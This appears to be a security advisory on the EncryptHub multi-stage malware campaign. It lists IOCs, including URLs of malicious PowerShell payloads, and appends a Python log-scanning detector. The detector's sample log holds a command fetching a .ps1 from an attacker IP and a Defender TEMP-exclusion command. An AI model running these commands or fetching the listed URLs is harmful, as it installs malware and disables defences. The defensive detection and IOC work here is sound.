EncryptHub: A Multi-Stage Malware Breach Impacting 600 Organizations – Active IOCs

Severity

High

Analysis Summary

EncryptHub, a highly sophisticated cybercriminal group, has compromised around 600 organizations through a multi-stage malware campaign. The attackers leveraged multiple layers of PowerShell scripts to gather system data, exfiltrate sensitive information, evade detection, and deploy information stealers. Their primary infection method involved trojanized versions of widely used applications, including QQ Talk, WeChat, Microsoft Visual Studio 2022, and Palo Alto Global Protect. These fake applications were generated between November 25th, 2024, and January 1st, 2025, and were signed with code-signing certificates, initially issued to “HOA SEN HA NAM ONE MEMBER LIMITED LIABILITIES COMPANY” before being revoked. By February 4th, 2025, the group had switched to a new certificate registered under “Encrypthub LLC,” showcasing their adaptability.

A key aspect of EncryptHub’s operation is its use of third-party distribution channels to maximize reach. They utilized a pay-per-install service called “LabInstalls,” operating via a Telegram bot, which allowed them to automate malicious payload distribution. According to researchers, EncryptHub prioritizes stolen credentials based on cryptocurrency ownership, corporate affiliations, and the presence of VPN software, reflecting a highly targeted approach. Researchers also discovered operational security lapses by the attackers that inadvertently exposed critical infrastructure details, which allowed security analysts to map EncryptHub’s tactics in depth.

The attack sequence begins with a PowerShell command fetching the first-stage payload from a compromised domain, designed to steal credentials from messaging applications, crypto wallets, password managers, and VPN clients. The second stage involves a PowerShell script, runner.ps1, which processes base64-encoded MSC files to embed malicious URLs. In the third stage, an HTML-based loader manipulates Windows Defender settings to exclude the TEMP folder from scanning while downloading additional scripts. The final stage delivers Rhadamanthys malware, completing the infection chain and ensuring persistent access.

EncryptHub’s activities indicate ongoing evolution, with researchers detecting the development of “EncryptRAT,” a remote access Trojan designed for centralized command-and-control operations. This suggests the group may soon commercialize its malware as a service for other cybercriminals. Organizations are urged to implement robust security measures, including endpoint detection, multi-layered defenses, and continuous monitoring, to defend against this rapidly evolving threat landscape.

Impact

  • Exfiltrate Sensitive Information
  • Evade Detection
  • Gain Access

Indicators of Compromise

IP

  • 45.131.215.16
  • 64.95.13.166
  • 82.115.223.199
  • 185.215.113.97
  • 31.41.244.11
  • 185.215.113.39

MD5

  • 40c33d6796a0092c1ea09650a254370b
  • e295d3217ccd1310cfb3f599758f41ff
  • 9747203f97be19e5e4445dba62035f1a
  • f6b7467e9067d20e853d682989582e81
  • 87792cf4bd370f483a293a23c4247c50
  • 832b3d652330366ce49ed4667bc43f0b
  • 5488c867b16fa0ff44dc975caf8e5f8e
  • e2d005af8f840f371ab2cef870dacbcf
  • 6522aad0b04cb58ab8cf30b3a8578fb1

SHA-256

  • 532f4c9c72f1c77531a55f7811371aa65f85fc3a768d792482cab3381cdd29b3
  • 37bf1269a21cba22af239e734de043f1d08d61b44414bcf63b1b9198e6a8bc87
  • 7d222bb62ae995479f05d4bddaa0b7d6dd7ade8d9c438214b00cc1d1be9b9db1
  • cc70570dd68a01ef43497c13ea7e5620256208b73bd1e4487f3bf0c91617169f
  • 725df91a9db2e077203d78b8bef95b8cf093e7d0ee2e7a4f55a30fe200c3bf8f
  • c124f307ffbfdba7190c0df9651e895c720962094a78a0af347b2f1e7a8962d0
  • 90b7b711f56f00a1fa08a7a29f2cd8602b8aa1a0d78986dbfc9f64e38ac6cecd
  • 1bce694f9f811982eb01d381a69cdd56c3fa81d113e41b5acb902ec66ec942b1
  • 411e6413afc5dadc63f69dd37d25f23dfee1fbd5eff1a591ba33dfc38ca5a4fd

SHA-1

  • 4fe2536fe0ac8e04ccceb1769e33fe3dff96e2a4
  • 47347a8c85d90e2eb5dc966f305c596009f41128
  • 6a66d2e6441acfa331ea428a4e3fad352afa82c6
  • d94ea984003734cde0d50f981de47d35a2638d16
  • a225bee48074feac53c7cb2f3929a41f7b4a71d3
  • 9bd0b7a37a0791e7ff6bc270d18d3fbd887752c8
  • 46d79522034154848935839619d622cb56297bc3
  • c1bd7bc905fee7f749329fbd70fd8fd37319b300
  • d4ece3957927d4440a43a00a7c0d30ea21238809

URL

  • http://185.215.113.97/files/5094364719/LR8QUOU.ps1
  • http://31.41.244.11/files/5094364719/WClchuE.ps1
  • http://185.215.113.39/files/5094364719/7GVy9sB.ps1
  • http://31.41.244.11/files/5094364719/wclchue.ps1
  • http://31.41.244.11/files/5094364719/wVjWGck.ps1
  • http://185.215.113.39/files/5094364719/pcuy9xE.ps1

Remediation

  • Block all threat indicators at your respective controls.
  • Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
  • Deploy advanced endpoint detection and response (EDR) solutions.
  • Regularly update and patch all software, especially security tools.
  • Enforce multi-factor authentication (MFA) for all user accounts.
  • Limit administrative privileges and use role-based access control (RBAC).
  • Implement network segmentation to contain threats.
  • Use email filtering and attachment scanning to detect phishing attempts.
  • Continuously monitor logs for unusual authentication attempts and data exfiltration.
  • Set up alerts for PowerShell execution and unauthorized system modifications.
  • Verify software integrity before installation; avoid downloading from untrusted sources.
  • Revoke and replace any compromised digital certificates.
  • Conduct regular security awareness training on phishing and social engineering threats.
  • Educate employees on identifying trojanized applications and suspicious downloads.
  • Maintain regular offline backups of critical data.
  • Develop and test an incident response plan for malware infections.
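The following script is an added example, not Rewterz tooling, showing how the "search for IOCs" and "alert on PowerShell execution and unauthorized system modifications" recommendations above can be operationalized against the attack chain described in the analysis summary. It scans log lines for the advisory's IP, URL and hash indicators and for the stage-three Defender change (excluding the TEMP folder from scanning). The log lines are constructed for illustration; the IP and URL values are copied from the IOC section, and only the first hash of each list is included to keep the block short. The advisory does not name the cmdlet the loader uses, so matching `Add-MpPreference -ExclusionPath` is an assumption based on the standard way a Defender path exclusion is added.

```python
import re
from dataclasses import dataclass

# Indicators copied from the advisory's IOC section. Hashes are a subset
# (first entry of the MD5, SHA-1 and SHA-256 lists); extend with the rest.
IOC_IPS = {
    "45.131.215.16", "64.95.13.166", "82.115.223.199",
    "185.215.113.97", "31.41.244.11", "185.215.113.39",
}
IOC_URLS = {u.lower() for u in (
    "http://185.215.113.97/files/5094364719/LR8QUOU.ps1",
    "http://31.41.244.11/files/5094364719/WClchuE.ps1",
    "http://185.215.113.39/files/5094364719/7GVy9sB.ps1",
    "http://31.41.244.11/files/5094364719/wclchue.ps1",
    "http://31.41.244.11/files/5094364719/wVjWGck.ps1",
    "http://185.215.113.39/files/5094364719/pcuy9xE.ps1",
)}
IOC_HASHES = {
    "40c33d6796a0092c1ea09650a254370b",                                  # MD5
    "4fe2536fe0ac8e04ccceb1769e33fe3dff96e2a4",                          # SHA-1
    "532f4c9c72f1c77531a55f7811371aa65f85fc3a768d792482cab3381cdd29b3",  # SHA-256
}

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://[^\s'\")]+")
HASH_RE = re.compile(r"\b(?:[0-9a-f]{64}|[0-9a-f]{40}|[0-9a-f]{32})\b")
# Stage three excludes TEMP from Defender scanning. The advisory does not name
# the cmdlet; Add-MpPreference -ExclusionPath is assumed here because it is the
# documented way to add a Defender path exclusion. Lines are lower-cased first.
DEFENDER_TEMP_RE = re.compile(r"add-mppreference\b.*-exclusionpath\s+\S*temp")


@dataclass(frozen=True)
class Finding:
    line_no: int
    rule: str
    indicator: str


def scan_lines(lines):
    """Return one Finding per (line, rule, indicator) hit, in line order.

    Matching is case-insensitive so the two casings of the WClchuE.ps1 URL
    in the advisory collapse to a single indicator.
    """
    findings = []
    for n, raw in enumerate(lines, start=1):
        line = raw.lower()
        for ip in sorted(set(IPV4_RE.findall(line)) & IOC_IPS):
            findings.append(Finding(n, "ioc_ip", ip))
        for url in sorted(set(URL_RE.findall(line)) & IOC_URLS):
            findings.append(Finding(n, "ioc_url", url))
        for h in sorted(set(HASH_RE.findall(line)) & IOC_HASHES):
            findings.append(Finding(n, "ioc_hash", h))
        if DEFENDER_TEMP_RE.search(line):
            findings.append(Finding(n, "defender_exclusion_temp",
                                    "Add-MpPreference -ExclusionPath ...TEMP"))
    return findings


# Constructed sample log (not real telemetry): a PowerShell script block log
# (Event ID 4104), a proxy log, an EDR file event and one benign proxy line.
SAMPLE_LOG = [
    "2025-02-05T10:12:03Z host=WS-17 EventID=4104 ScriptBlockText=Invoke-WebRequest "
    "-Uri 'http://31.41.244.11/files/5094364719/WClchuE.ps1' -OutFile $env:TEMP\\s.ps1",
    "2025-02-05T10:12:05Z host=WS-17 EventID=4104 ScriptBlockText=Add-MpPreference "
    "-ExclusionPath $env:TEMP",
    "2025-02-05T10:12:06Z proxy src=10.0.0.23 dst=185.215.113.39 "
    "url=http://185.215.113.39/files/5094364719/7GVy9sB.ps1",
    "2025-02-05T10:12:09Z edr host=WS-17 file=C:\\Users\\a\\AppData\\Local\\Temp\\update.exe "
    "sha256=532f4c9c72f1c77531a55f7811371aa65f85fc3a768d792482cab3381cdd29b3",
    "2025-02-05T10:13:00Z proxy src=10.0.0.24 dst=93.184.216.34 url=http://example.com/index.html",
]


def scan_sample():
    """Run the rules over the constructed sample log."""
    return scan_lines(SAMPLE_LOG)


if __name__ == "__main__":
    for f in scan_sample():
        print(f"line {f.line_no}: {f.rule} -> {f.indicator}")
```

Each hit is reported with its rule name so the IOC matches (which may be stale once the infrastructure rotates) can be triaged separately from the Defender exclusion rule, which is behavioural and stays useful after the listed IPs and URLs go dark. Feed it with exported script block, proxy and EDR logs instead of `SAMPLE_LOG` to run it against a real environment.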